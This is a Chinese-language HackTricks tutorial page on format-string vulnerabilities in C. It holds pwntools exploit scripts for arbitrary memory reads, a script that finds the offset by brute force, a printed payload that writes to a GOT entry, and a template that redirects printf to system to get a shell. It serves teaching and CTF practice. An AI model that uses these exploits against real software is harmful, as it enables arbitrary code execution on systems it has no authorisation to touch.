hacktricks/binary-exploitation/format-strings
2024-11-19 11:59:04 +00:00
..
format-strings-arbitrary-read-example.md Translated ['README.md', 'backdoors/salseo.md', 'binary-exploitation/arb 2024-07-18 17:33:27 +00:00
format-strings-template.md Translated ['README.md', 'backdoors/salseo.md', 'binary-exploitation/arb 2024-07-18 17:33:27 +00:00
README.md Translated ['README.md', 'binary-exploitation/format-strings/README.md', 2024-11-19 11:59:04 +00:00

格式字符串

{% hint style="success" %} 学习与实践 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE)
学习与实践 GCP 黑客技术:HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks
{% endhint %}

如果你对 黑客职业 感兴趣并想要攻克不可攻克的目标 - 我们正在招聘! (要求流利的波兰语书写和口语能力).

{% embed url="https://www.stmcyber.com/careers" %}

基本信息

在 C 语言中,printf 是一个可以用来 打印 字符串的函数。该函数期望的 第一个参数带格式化符的原始文本。后续的 参数替代 原始文本中的 格式化符

其他易受攻击的函数包括 sprintf()fprintf()

攻击者的文本被用作该函数的第一个参数 时,就会出现漏洞。攻击者将能够构造一个 特殊输入,利用 printf 格式 字符串的能力来读取和 写入任何地址(可读/可写) 的任何数据。这样就能够 执行任意代码

格式化符:

%08x —> 8 hex bytes
%d —> Entire
%u —> Unsigned
%s —> String
%p —> Pointer
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3

示例:

  • 易受攻击的示例:
char buffer[30];
gets(buffer);  // Dangerous: takes user input without restrictions.
printf(buffer);  // If buffer contains "%x", it reads from the stack.
  • 正常使用:
int value = 1205;
printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5
  • 缺少参数:
printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.
  • fprintf 漏洞:
#include <stdio.h>

int main(int argc, char *argv[]) {
char *user_input;
user_input = argv[1];
FILE *output_file = fopen("output.txt", "w");
fprintf(output_file, user_input); // The user input can include formatters!
fclose(output_file);
return 0;
}

访问指针

格式 %<n>$x,其中 n 是一个数字,允许指示 printf 选择第 n 个参数(来自栈)。因此,如果您想使用 printf 读取栈中的第 4 个参数,可以这样做:

printf("%x %x %x %x")

并且你会从第一个参数读取到第四个参数。

或者你可以这样做:

printf("%4$x")

并直接读取第四个。

注意,攻击者控制了 printf 参数,这基本上意味着 他的输入将在调用 printf 时位于栈中,这意味着他可以在栈中写入特定的内存地址。

{% hint style="danger" %} 控制此输入的攻击者将能够 在栈中添加任意地址并使 printf 访问它们。下一节将解释如何利用这种行为。 {% endhint %}

任意读取

可以使用格式化符 %n$s 使 printf 获取位于 n 位置地址,并 将其作为字符串打印(打印直到找到 0x00。因此如果二进制文件的基地址是 0x8048000,并且我们知道用户输入从栈的第四个位置开始,则可以使用以下方式打印二进制文件的开头:

from pwn import *

p = process('./bin')

payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'

{% hint style="danger" %} 注意,您不能将地址 0x8048000 放在输入的开头,因为字符串将在该地址的末尾以 0x00 结束。 {% endhint %}

查找偏移量

要找到输入的偏移量,您可以发送 4 或 8 个字节(0x41414141),后跟 %1$x增加 值,直到检索到 A's

暴力破解 printf 偏移量 ```python # Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

Iterate over a range of integers

for i in range(10):

Construct a payload that includes the current integer as offset

payload = f"AAAA%{i}$x".encode()

Start a new process of the "chall" binary

p = process("./chall")

Send the payload to the process

p.sendline(payload)

Read and store the output of the process

output = p.clean()

Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output

if b"41414141" in output:

If the string is found, log the success message and break out of the loop

log.success(f"User input is at offset : {i}") break

Close the process

p.close()

</details>

### 有多有用

任意读取可以用于:

* **从内存中转储** **二进制文件**
* **访问存储敏感** **信息**的内存特定部分(如金丝雀、加密密钥或自定义密码,如在这个 [**CTF 挑战**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value) 中)

## **任意写入**

格式化器 **`%<num>$n`** **在** **指定地址**中写入**已写入字节的数量**,该地址在栈中的 \<num> 参数中。如果攻击者可以使用 printf 写入任意数量的字符,他将能够使 **`%<num>$n`** 在任意地址写入任意数字。

幸运的是,要写入数字 9999并不需要在输入中添加 9999 个 "A",因此可以使用格式化器 **`%.<num-write>%<num>$n`** 在 **`num` 位置指向的地址**中写入数字 **`<num-write>`**。
```bash
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500

然而,请注意,通常为了写入一个地址,例如 0x08049724(这是一个一次性写入的巨大数字),使用的是 $hn 而不是 $n。这允许只写入 2 字节。因此,这个操作需要进行两次,一次用于地址的最高 2B另一次用于最低的 2B。

因此,这个漏洞允许在任何地址写入任何内容(任意写入)。

在这个例子中,目标是覆盖一个函数GOT表中的地址,该函数将在稍后被调用。尽管这可以滥用其他任意写入到执行的技术:

{% content-ref url="../arbitrary-write-2-exec/" %} arbitrary-write-2-exec {% endcontent-ref %}

我们将覆盖一个函数,该函数接收来自用户参数指向****system 函数
如前所述,写入地址通常需要 2 个步骤:您首先写入地址的 2 字节,然后写入另外 2 字节。为此使用**$hn**。

  • HOB 被调用为地址的 2 个高字节
  • LOB 被调用为地址的 2 个低字节

然后,由于格式字符串的工作方式,您需要首先写入较小的 [HOB, LOB],然后写入另一个。

如果 HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]

如果 HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]

HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB

{% code overflow="wrap" %}

python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'

{% endcode %}

Pwntools 模板

您可以在以下位置找到准备此类漏洞利用的模板

{% content-ref url="format-strings-template.md" %} format-strings-template.md {% endcontent-ref %}

或者这个基本示例来自这里

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline('/bin/sh')

p.interactive()

格式字符串到缓冲区溢出

可以利用格式字符串漏洞的写入操作来写入栈的地址并利用缓冲区溢出类型的漏洞。

其他示例与参考

如果你对黑客职业感兴趣并想要攻克不可攻克的目标 - 我们正在招聘!需要流利的波兰语书写和口语能力)。

{% embed url="https://www.stmcyber.com/careers" %}

{% hint style="success" %} 学习与实践AWS黑客技术HackTricks培训AWS红队专家ARTE
学习与实践GCP黑客技术HackTricks培训GCP红队专家GRTE

支持HackTricks